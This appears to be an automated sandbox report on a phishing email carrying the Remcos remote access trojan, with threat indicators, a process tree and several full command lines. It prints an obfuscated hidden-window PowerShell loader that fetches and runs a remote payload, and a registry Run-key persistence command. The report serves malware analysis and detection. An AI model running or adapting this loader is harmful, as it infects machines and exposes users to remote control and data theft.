File name:

92093672-f98f-3255-101c-e031e624c481.eml

Full analysis: https://app.any.run/tasks/520d7d6f-aa61-48b3-87f7-b187c50ed809
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Malware Trends Tracker     >>>
Analysis date: May 27, 2025, 06:08:48
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
attachments
attc-unc
susp-attachments
dkim-fail
rat
remcos
remote
Indicators:
MIME: message/rfc822
File info: RFC 822 mail, ASCII text, with CRLF line terminators
MD5:

326FCE10991A02776F4569DD933D0875

SHA1:

28DA7BE1360A324C097B0A5B5CE434F7DE200C61

SHA256:

2E8D22ED33FD2C47A93FC9B2D225E7525BEF9E30B2BAD94E32111C661DD568AB

SSDEEP:

384:8DD350B7qDiH1XBfC73sMD2yX55NxPO0oUWt8l+wy+O5SIpWC+8Kk25cSv:3/q732sDbMCl+wy75tpWCFb25cSv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 4000)
      • powershell.exe (PID: 856)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7800)

    • Executes malicious content triggered by hijacked COM objects (POWERSHELL)

      • powershell.exe (PID: 7800)

    • REMCOS has been detected (SURICATA)

      • msiexec.exe (PID: 7264)

  • SUSPICIOUS

    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)
      • powershell.exe (PID: 856)
      • powershell.exe (PID: 1512)
      • powershell.exe (PID: 4000)
      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 7844)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7740)
      • cmd.exe (PID: 7260)
      • cmd.exe (PID: 7012)
      • powershell.exe (PID: 8008)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 7800)

    • Retrieves command line args for running process (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)

    • Creates an instance of the specified .NET type (POWERSHELL)

      • powershell.exe (PID: 7800)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 7996)

    • Starts CMD.EXE for commands execution

      • msiexec.exe (PID: 7264)

    • Connects to unusual port

      • msiexec.exe (PID: 7264)

    • Contacting a server suspected of hosting an CnC

      • msiexec.exe (PID: 7264)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 1328)

    • Application launched itself

      • powershell.exe (PID: 8008)

  • INFO

    • Manual execution by a user

      • WinRAR.exe (PID: 7540)
      • cmd.exe (PID: 7740)
      • notepad.exe (PID: 7936)
      • powershell.exe (PID: 7996)
      • cmd.exe (PID: 7260)
      • powershell.exe (PID: 1512)
      • cmd.exe (PID: 7012)
      • powershell.exe (PID: 8008)
      • powershell.exe (PID: 7844)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)

    • Disables trace logs

      • powershell.exe (PID: 7800)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)

    • Checks proxy server information

      • powershell.exe (PID: 7800)

    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 7936)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7996)

    • Returns hidden items found within a container (POWERSHELL)

      • conhost.exe (PID: 8004)
      • conhost.exe (PID: 7360)
      • conhost.exe (PID: 5544)
      • conhost.exe (PID: 2268)
      • conhost.exe (PID: 7692)
      • conhost.exe (PID: 7968)
      • conhost.exe (PID: 7608)

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 7996)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7996)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 7264)

    • The sample compiled with english language support

      • msiexec.exe (PID: 7264)

    • Reads the software policy settings

      • slui.exe (PID: 5392)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.eml | E-Mail message (Var. 5) (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
171
Monitored processes
36
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start outlook.exe ai.exe no specs sppextcomobj.exe no specs slui.exe winrar.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe notepad.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe conhost.exe no specs powershell.exe no specs #REMCOS msiexec.exe slui.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs svchost.exe powershell.exe no specs svchost.exe no specs svchost.exe no specs svchost.exe no specs svchost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs msiexec.exe msiexec.exe powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
856powershell.exe -windowstyle hidden "Get-ChildItem;Get-Service;$Baadlngderne=(gcm A:).CommandType;$Baadlngderne=[String]$Baadlngderne;$Skobrster='Cordialises';$Baadlngderne+=':';(n`i -p $Baadlngderne -n paik -value { param ($Atocia39);$Skobrster='Arbejdsopgaver';$Hjemmesiden=4;$Smurks='Sarin';do {$Shingling+=$Atocia39[$Hjemmesiden];$Hjemmesiden+=5} until(!$Atocia39[$Hjemmesiden])$Shingling});(n`i -p $Baadlngderne -n Lempninger -value {param ($Nephralgic);.($Demonographies123) ($Nephralgic)});ConvertTo-Html;$Skossen=paik ' KbsN Ho EGrdhTVred.BuniW';$Skossen+=paik 'A teeT,rfBContcTy nL Wavi GraEAlenND ant';$Gradationately=paik '.rteMSpisobevezD.taiM,dilBajolBlaaaSha /';$Poligarship=paik 'RekrTAzoxlPrecs itt1Sjus2';$Smugleri='Spli[BeloNAppeE.kovTM,da.TikiSPr.vEArraRSokkV dleiDrabcAt.rETuvapHandoCannINex nDex T Sarm MycAP ogNGrntAGu,zg SecESkygRInco]Inda:Rott:rallS ,rueBorgCMi.aUOsphR.rodi nttSatuYTalePLum R SkroSja.t PreOU dic Ko OstrilOver= Rea$WeazPPm soAntelJenkiF,nggFarta D mrTrans,smeh BerIUdtaP';$Gradationately+=paik ' Bro5 lek.Ri c0Ind nd(,equW GoliSmo.nEksedTallorosiwSuprsFors EupN Fo TBoks Vrdi1.jrs0Mini.qu.a0Evne;Infr Ac.uWF ldiSymbnCu s6Samm4 Mar;Canr U.skxfuld6 M f4 Tvr;Nytt GstrSoldvUnca:Unlo1O.er3Alca7 Ana.K,ig0Tred),lin KresGWoote .idc BeskByggoP ut/For 2Stig0Bund1Sd k0R gs0 len1Bran0O,er1Teks BrnF AnkiCassr PseeAktif MiloU dexBags/ esu1 ust3 Pt 7Mari.Ocea0';$Wingbeats=paik 'Gr gUAltasAngieSp nrbarb-Konsa derGCyn.EI senF ret';$Multistorey=paik ' FryhDethtRegntPolypEkspsNitt:Slu,/F re/ Je bDis aFo.rn C lgJackl Z raMi hd BameOr.dsLil hAutoc haneT.ygnArkatBengr co.aRecelTroppudfrrAnt eUgels,ilis avcRougl.egauMonebSpnd. Pascdat.oBeklmPfun/diagPGabiiTastnBrn.d KseeKontrFakuiVen 1 Ove7fo t0Down.dierc Coah Belm';$Resealed=paik 'Hype>';$Demonographies123=paik ' .upIQu nETyvtX';$Prisniveauernes='Noddles';$Shmoozes='\Fricative.Han';Lempninger (paik 'Stap$BrangSteglDr pORegebAfgaA EvoL Agt:RefoBMe ir.ipsiSociXdismvhaploThalL,elsDFarv= Tor$ TruEBegnnMoraVRu a: npraImpoPDo,uP SrgdForbaCisttHys.As rt+Brnd$BehaSPresHAntiMUnlioBipaO ,utZNonaeOrtos');Lempninger (paik 'Edda$DigegS meLDichoPantbSiljaNajaL S m:Ca,ghHalvo romLandOVrool,ichOEso GOverIGut SAnsti Rovn norgAfsk=Wohl$Ad,pmN.elUSodol Itst SkoIOps s onnTOmnooDeprr tarEInteYAsse.Ro.lsRaa,P.tatL rinIVej.tsor.( B g$FatoRKendE Zi,S sw eI.niaNayaLBlabeSocidGand)');Lempninger (paik $Smugleri);$Multistorey=$Homologising[0];$Schizogregarine=(paik ' War$Y.lpGSpril orsOTot.bdoriaDo dlObol:Bus SFou tlegeaFuzzt E nIMorfOAffanHalfsfarvFProaoeg ir VejsSnitTNovia ArbNFrilD.laneC loRDefiSMega=godkN TelEUdplW Gut-GeheOKonobEl vJ F,reMa,cC Fo tDelg .anSPestyV deSLngdTsekuEMairMfrij. Lot$BituspeopKUnwaoO,tcSMitiS GeneB kpn');Lempninger ($Schizogregarine);Lempninger (paik 'None$Kol SSu et rosaSalttOp,qiPrenoUrfjn ch sCitef.foro KulrSndesperstBlodaSchenunildUndeeBagarEpausUnde.Sl eHSukkefluea ulndFilieRen,rShrisData[Paci$Int.WMagni Equn antgfrivbOvereMagnaGenttEsrosPara] ilb=Haus$.imuG Fo,rExcia I edGlauaBystt AfriBeleoUnwrnAffaa enetUndie RoslBrney');$Hvirvelstroemmen=paik 'T,skDEskaoSmaawCra.n embl Trao aria CridTokaFLvefiBrnelSupie';$formularise=paik 'pmsg$ ydrSP litPolya atatB,rbiVi uoSaunn Fjosno af Derod rmr TecsH rvtH eraMetan Sy ddal eSus,rlstes Pol.S gn$U coHBranvFir iNedsrTankv crue heclSminsBrdntEje rSommoSamfeMuslmE ghmIdeneBoolnUnin. LizIPri nBanavDupnoUnh kCardeSt n( Ger$L.tvM famu lkl,akst I diThrosT.yktdinnoTanqrFluee,renyNonf,Deno$ B vP Elliau,ynF orkdivieInderUnbusNeks)';$Pinkers=$Brixvold;Lempninger (paik 'Bal.$Vangg I cLAfsnO tribVaneA.onilNysk: InwA U,ar rreiLu asSkrikCheaeUngr=Voks(H.mlTTilseProvs stetindi-FlegpM.liA B,oTBeskHB,fr Boh $a tipTr tI WatNNonbKH ndeBijarCherSApp )');while (!$Ariske) {Lempninger (paik 'Tamb$Ditig.egnl,ippoUnbabSluka eaclUds :Na uR ommrHonoiSubag gtesA git eli=S,ke$gev DFornlSls e vins') ;Lempninger $formularise;Lempninger (paik ' Pyg[PoleTSupehmeilRHo.hE .nmaAudiDWeltIC luntr mgPunn.SvigTSddoHNonirkaree UnwaRaaddMedd] Bog:.ale:Ha mSLinolTotae vise StapJus.(Z.nc4 Hal0 Dow0no t0Tilb)');Lempninger (paik 'D,te$ B sgM taLkun oAdreB egoAGrail Una:CoppaEc iRSulpiUngdS A.tkJagtE nkl=Agor(SgnitUnstEEbelS ccotMeno-RdnbpSurraPicot InsHoryx Asti$A tip uppIWi sn AfvkSalaEMillR aveS Sa.)') ;Lempninger (paik '.iki$Anakg ympLKviko eribRe fa Pa LParl:ElecS JackDislUtrkbmpaomLZa,ceImplSCuar=Brom$ Ti GFruglTechOGrinB t iaBegyLSnks:bartfRettLCampUMisdeGeheF Hori aboS ManK M ne mgr Di EBranSudso+Se l+Mi,j%Milj$EvalHSishOHe,sM pero Ba LC rroUkuegKo biS.usSCemeiRus NF rpGDe e.Eme cFinno OveuAksiNImmot') ;$Multistorey=$Homologising[$Skumles]}$Trike225=382880;$Parataktiske=28663;Lempninger (paik ' Acr$As rGspleLStvfOjo dBGruna .omlDelt:FacevD pnEMaltXRevoApothTFodbILazuOPostNSy.fsHelt Feel= nva Tiltg ukkeProsT,nsu-.dskcFrosoKlisNUndeT,hysE GraN ishtDrum bal$FortP PteiSkrin KomkR,vee Bu rWests');Lempninger (paik 'Sokk$ SalgBesmlToucoRnnebTatoaIntelMund:PagaR roa ca tDkn hTreso St,lInveeSublsDokt Triu= Tee Konv[ BoyS,unfyBrucsjagttPr ieIllumNons.Umr CTilfoDatanFrysv D deDi krCountOver]B,st:Laye:OogoFButtrsprgoVoldmSu.eBUn.xaS agsm due lde6Told4MetaSTobat tacrDiskiDespnInsigCulo( Pur$ weVBra esubtxInfaaRasetBackiPerioHal.nKno sRund)');Lempninger (paik '.lut$frs GRitulTo loP imb eubaKnopl neu:LangF Marj Ka,eMartr P ld UdsIFaldNC mmGpiz SSo s Bea =d ft ,ade[MykosObedyAnlbSGoest.terE pimFa.s.EnuctTimeEGu.lXHvidT Im .Bo tETeknns jecT piOopfrD ystIBrndnWittgAncy]Skov:Livs:Sla a P rs IncCTe riRekliAfka. OblGM nnEBrugt NorS,lutTBillrSamfiSt nNStjrG ,ak(Blep$LutiRRetsa K,mt.preH scaOB onlC naESty sDarr)');Lempninger (paik 'Kies$SejlGLloylEfovO.radb.elmaStukL Tak:brnea U msPrisPSieveTragrPipeGOrgaiSysilS ralSvrmi ndefDo ioTilmr opsMPack=c mp$Ska fClotJCauseUdlur be,dSclei SednNonsGSkatsP pe.VkstSLi rURektbTyroSres t ljeRDekaII dvnOv rGKnko( Ove$ Humt Antrl,teIRapnk idde Sle2.rfo2 F.n5 Poz,S.ks$Dis PNon acronR AppaC rcTSupeAHypok Gevt De i AccSma.nkmaadeU rm)');Lempninger $Aspergilliform;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1116C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\admin\AppData\Local\Temp\drpbaqnzqqcaxtbo"C:\Windows\SysWOW64\svchost.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\thda70.tmp
c:\windows\syswow64\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
1328"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Cupolated" /t REG_EXPAND_SZ /d "%pikhammer% -windowstyle 2 $Nonsyntactically=(g`p 'HKCU:\Software\Standardprodukter\').'Skarnskngtene';%pikhammer% ($Nonsyntactically)"C:\Windows\SysWOW64\cmd.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
1512"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-ChildItem;Get-Service;$Baadlngderne=(gcm A:).CommandType;$Baadlngderne=[String]$Baadlngderne;$Skobrster='Cordialises';$Baadlngderne+=':';(n`i -p $Baadlngderne -n paik -value { param ($Atocia39);$Skobrster='Arbejdsopgaver';$Hjemmesiden=4;$Smurks='Sarin';do {$Shingling+=$Atocia39[$Hjemmesiden];$Hjemmesiden+=5} until(!$Atocia39[$Hjemmesiden])$Shingling});(n`i -p $Baadlngderne -n Lempninger -value {param ($Nephralgic);.($Demonographies123) ($Nephralgic)});ConvertTo-Html;$Skossen=paik ' KbsN Ho EGrdhTVred.BuniW';$Skossen+=paik 'A teeT,rfBContcTy nL Wavi GraEAlenND ant';$Gradationately=paik '.rteMSpisobevezD.taiM,dilBajolBlaaaSha /';$Poligarship=paik 'RekrTAzoxlPrecs itt1Sjus2';$Smugleri='Spli[BeloNAppeE.kovTM,da.TikiSPr.vEArraRSokkV dleiDrabcAt.rETuvapHandoCannINex nDex T Sarm MycAP ogNGrntAGu,zg SecESkygRInco]Inda:Rott:rallS ,rueBorgCMi.aUOsphR.rodi nttSatuYTalePLum R SkroSja.t PreOU dic Ko OstrilOver= Rea$WeazPPm soAntelJenkiF,nggFarta D mrTrans,smeh BerIUdtaP';$Gradationately+=paik ' Bro5 lek.Ri c0Ind nd(,equW GoliSmo.nEksedTallorosiwSuprsFors EupN Fo TBoks Vrdi1.jrs0Mini.qu.a0Evne;Infr Ac.uWF ldiSymbnCu s6Samm4 Mar;Canr U.skxfuld6 M f4 Tvr;Nytt GstrSoldvUnca:Unlo1O.er3Alca7 Ana.K,ig0Tred),lin KresGWoote .idc BeskByggoP ut/For 2Stig0Bund1Sd k0R gs0 len1Bran0O,er1Teks BrnF AnkiCassr PseeAktif MiloU dexBags/ esu1 ust3 Pt 7Mari.Ocea0';$Wingbeats=paik 'Gr gUAltasAngieSp nrbarb-Konsa derGCyn.EI senF ret';$Multistorey=paik ' FryhDethtRegntPolypEkspsNitt:Slu,/F re/ Je bDis aFo.rn C lgJackl Z raMi hd BameOr.dsLil hAutoc haneT.ygnArkatBengr co.aRecelTroppudfrrAnt eUgels,ilis avcRougl.egauMonebSpnd. Pascdat.oBeklmPfun/diagPGabiiTastnBrn.d KseeKontrFakuiVen 1 Ove7fo t0Down.dierc Coah Belm';$Resealed=paik 'Hype>';$Demonographies123=paik ' .upIQu nETyvtX';$Prisniveauernes='Noddles';$Shmoozes='\Fricative.Han';Lempninger (paik 'Stap$BrangSteglDr pORegebAfgaA EvoL Agt:RefoBMe ir.ipsiSociXdismvhaploThalL,elsDFarv= Tor$ TruEBegnnMoraVRu a: npraImpoPDo,uP SrgdForbaCisttHys.As rt+Brnd$BehaSPresHAntiMUnlioBipaO ,utZNonaeOrtos');Lempninger (paik 'Edda$DigegS meLDichoPantbSiljaNajaL S m:Ca,ghHalvo romLandOVrool,ichOEso GOverIGut SAnsti Rovn norgAfsk=Wohl$Ad,pmN.elUSodol Itst SkoIOps s onnTOmnooDeprr tarEInteYAsse.Ro.lsRaa,P.tatL rinIVej.tsor.( B g$FatoRKendE Zi,S sw eI.niaNayaLBlabeSocidGand)');Lempninger (paik $Smugleri);$Multistorey=$Homologising[0];$Schizogregarine=(paik ' War$Y.lpGSpril orsOTot.bdoriaDo dlObol:Bus SFou tlegeaFuzzt E nIMorfOAffanHalfsfarvFProaoeg ir VejsSnitTNovia ArbNFrilD.laneC loRDefiSMega=godkN TelEUdplW Gut-GeheOKonobEl vJ F,reMa,cC Fo tDelg .anSPestyV deSLngdTsekuEMairMfrij. Lot$BituspeopKUnwaoO,tcSMitiS GeneB kpn');Lempninger ($Schizogregarine);Lempninger (paik 'None$Kol SSu et rosaSalttOp,qiPrenoUrfjn ch sCitef.foro KulrSndesperstBlodaSchenunildUndeeBagarEpausUnde.Sl eHSukkefluea ulndFilieRen,rShrisData[Paci$Int.WMagni Equn antgfrivbOvereMagnaGenttEsrosPara] ilb=Haus$.imuG Fo,rExcia I edGlauaBystt AfriBeleoUnwrnAffaa enetUndie RoslBrney');$Hvirvelstroemmen=paik 'T,skDEskaoSmaawCra.n embl Trao aria CridTokaFLvefiBrnelSupie';$formularise=paik 'pmsg$ ydrSP litPolya atatB,rbiVi uoSaunn Fjosno af Derod rmr TecsH rvtH eraMetan Sy ddal eSus,rlstes Pol.S gn$U coHBranvFir iNedsrTankv crue heclSminsBrdntEje rSommoSamfeMuslmE ghmIdeneBoolnUnin. LizIPri nBanavDupnoUnh kCardeSt n( Ger$L.tvM famu lkl,akst I diThrosT.yktdinnoTanqrFluee,renyNonf,Deno$ B vP Elliau,ynF orkdivieInderUnbusNeks)';$Pinkers=$Brixvold;Lempninger (paik 'Bal.$Vangg I cLAfsnO tribVaneA.onilNysk: InwA U,ar rreiLu asSkrikCheaeUngr=Voks(H.mlTTilseProvs stetindi-FlegpM.liA B,oTBeskHB,fr Boh $a tipTr tI WatNNonbKH ndeBijarCherSApp )');while (!$Ariske) {Lempninger (paik 'Tamb$Ditig.egnl,ippoUnbabSluka eaclUds :Na uR ommrHonoiSubag gtesA git eli=S,ke$gev DFornlSls e vins') ;Lempninger $formularise;Lempninger (paik ' Pyg[PoleTSupehmeilRHo.hE .nmaAudiDWeltIC luntr mgPunn.SvigTSddoHNonirkaree UnwaRaaddMedd] Bog:.ale:Ha mSLinolTotae vise StapJus.(Z.nc4 Hal0 Dow0no t0Tilb)');Lempninger (paik 'D,te$ B sgM taLkun oAdreB egoAGrail Una:CoppaEc iRSulpiUngdS A.tkJagtE nkl=Agor(SgnitUnstEEbelS ccotMeno-RdnbpSurraPicot InsHoryx Asti$A tip uppIWi sn AfvkSalaEMillR aveS Sa.)') ;Lempninger (paik '.iki$Anakg ympLKviko eribRe fa Pa LParl:ElecS JackDislUtrkbmpaomLZa,ceImplSCuar=Brom$ Ti GFruglTechOGrinB t iaBegyLSnks:bartfRettLCampUMisdeGeheF Hori aboS ManK M ne mgr Di EBranSudso+Se l+Mi,j%Milj$EvalHSishOHe,sM pero Ba LC rroUkuegKo biS.usSCemeiRus NF rpGDe e.Eme cFinno OveuAksiNImmot') ;$Multistorey=$Homologising[$Skumles]}$Trike225=382880;$Parataktiske=28663;Lempninger (paik ' Acr$As rGspleLStvfOjo dBGruna .omlDelt:FacevD pnEMaltXRevoApothTFodbILazuOPostNSy.fsHelt Feel= nva Tiltg ukkeProsT,nsu-.dskcFrosoKlisNUndeT,hysE GraN ishtDrum bal$FortP PteiSkrin KomkR,vee Bu rWests');Lempninger (paik 'Sokk$ SalgBesmlToucoRnnebTatoaIntelMund:PagaR roa ca tDkn hTreso St,lInveeSublsDokt Triu= Tee Konv[ BoyS,unfyBrucsjagttPr ieIllumNons.Umr CTilfoDatanFrysv D deDi krCountOver]B,st:Laye:OogoFButtrsprgoVoldmSu.eBUn.xaS agsm due lde6Told4MetaSTobat tacrDiskiDespnInsigCulo( Pur$ weVBra esubtxInfaaRasetBackiPerioHal.nKno sRund)');Lempninger (paik '.lut$frs GRitulTo loP imb eubaKnopl neu:LangF Marj Ka,eMartr P ld UdsIFaldNC mmGpiz SSo s Bea =d ft ,ade[MykosObedyAnlbSGoest.terE pimFa.s.EnuctTimeEGu.lXHvidT Im .Bo tETeknns jecT piOopfrD ystIBrndnWittgAncy]Skov:Livs:Sla a P rs IncCTe riRekliAfka. OblGM nnEBrugt NorS,lutTBillrSamfiSt nNStjrG ,ak(Blep$LutiRRetsa K,mt.preH scaOB onlC naESty sDarr)');Lempninger (paik 'Kies$SejlGLloylEfovO.radb.elmaStukL Tak:brnea U msPrisPSieveTragrPipeGOrgaiSysilS ralSvrmi ndefDo ioTilmr opsMPack=c mp$Ska fClotJCauseUdlur be,dSclei SednNonsGSkatsP pe.VkstSLi rURektbTyroSres t ljeRDekaII dvnOv rGKnko( Ove$ Humt Antrl,teIRapnk idde Sle2.rfo2 F.n5 Poz,S.ks$Dis PNon acronR AppaC rcTSupeAHypok Gevt De i AccSma.nkmaadeU rm)');Lempninger $Aspergilliform;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
1568REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Cupolated" /t REG_EXPAND_SZ /d "%pikhammer% -windowstyle 2 $Nonsyntactically=(g`p 'HKCU:\Software\Standardprodukter\').'Skarnskngtene';%pikhammer% ($Nonsyntactically)"C:\Windows\SysWOW64\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2236"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-ChildItem;Get-Service;=(gcm A:).CommandType;=[String];='Cordialises';+=':';(ni -p -n paik -value { param ();='Arbejdsopgaver';=4;='Sarin';do {+=[];+=5} until(![])});(ni -p -n Lempninger -value {param ();.() ()});ConvertTo-Html;=paik ' KbsN Ho EGrdhTVred.BuniW';+=paik 'A teeT,rfBContcTy nL Wavi GraEAlenND ant';=paik '.rteMSpisobevezD.taiM,dilBajolBlaaaSha /';=paik 'RekrTAzoxlPrecs itt1Sjus2';='Spli[BeloNAppeE.kovTM,da.TikiSPr.vEArraRSokkV dleiDrabcAt.rETuvapHandoCannINex nDex T Sarm MycAP ogNGrntAGu,zg SecESkygRInco]Inda:Rott:rallS ,rueBorgCMi.aUOsphR.rodi nttSatuYTalePLum R SkroSja.t PreOU dic Ko OstrilOver= Rea soAntelJenkiF,nggFarta D mrTrans,smeh BerIUdtaP';+=paik ' Bro5 lek.Ri c0Ind nd(,equW GoliSmo.nEksedTallorosiwSuprsFors EupN Fo TBoks Vrdi1.jrs0Mini.qu.a0Evne;Infr Ac.uWF ldiSymbnCu s6Samm4 Mar;Canr U.skxfuld6 M f4 Tvr;Nytt GstrSoldvUnca:Unlo1O.er3Alca7 Ana.K,ig0Tred),lin KresGWoote .idc BeskByggoP ut/For 2Stig0Bund1Sd k0R gs0 len1Bran0O,er1Teks BrnF AnkiCassr PseeAktif MiloU dexBags/ esu1 ust3 Pt 7Mari.Ocea0';=paik 'Gr gUAltasAngieSp nrbarb-Konsa derGCyn.EI senF ret';=paik ' FryhDethtRegntPolypEkspsNitt:Slu,/F re/ Je bDis aFo.rn C lgJackl Z raMi hd BameOr.dsLil hAutoc haneT.ygnArkatBengr co.aRecelTroppudfrrAnt eUgels,ilis avcRougl.egauMonebSpnd. Pascdat.oBeklmPfun/diagPGabiiTastnBrn.d KseeKontrFakuiVen 1 Ove7fo t0Down.dierc Coah Belm';=paik 'Hype>';=paik ' .upIQu nETyvtX';='Noddles';='\Fricative.Han';Lempninger (paik 'Stap pORegebAfgaA EvoL Agt:RefoBMe ir.ipsiSociXdismvhaploThalL,elsDFarv= Tor$ TruEBegnnMoraVRu a: npraImpoPDo,uP SrgdForbaCisttHys.As rt+Brnd ,utZNonaeOrtos');Lempninger (paik 'Edda meLDichoPantbSiljaNajaL S m:Ca,ghHalvo romLandOVrool,ichOEso GOverIGut SAnsti Rovn norgAfsk=Wohl,pmN.elUSodol Itst SkoIOps s onnTOmnooDeprr tarEInteYAsse.Ro.lsRaa,P.tatL rinIVej.tsor.( B g Zi,S sw eI.niaNayaLBlabeSocidGand)');Lempninger (paik 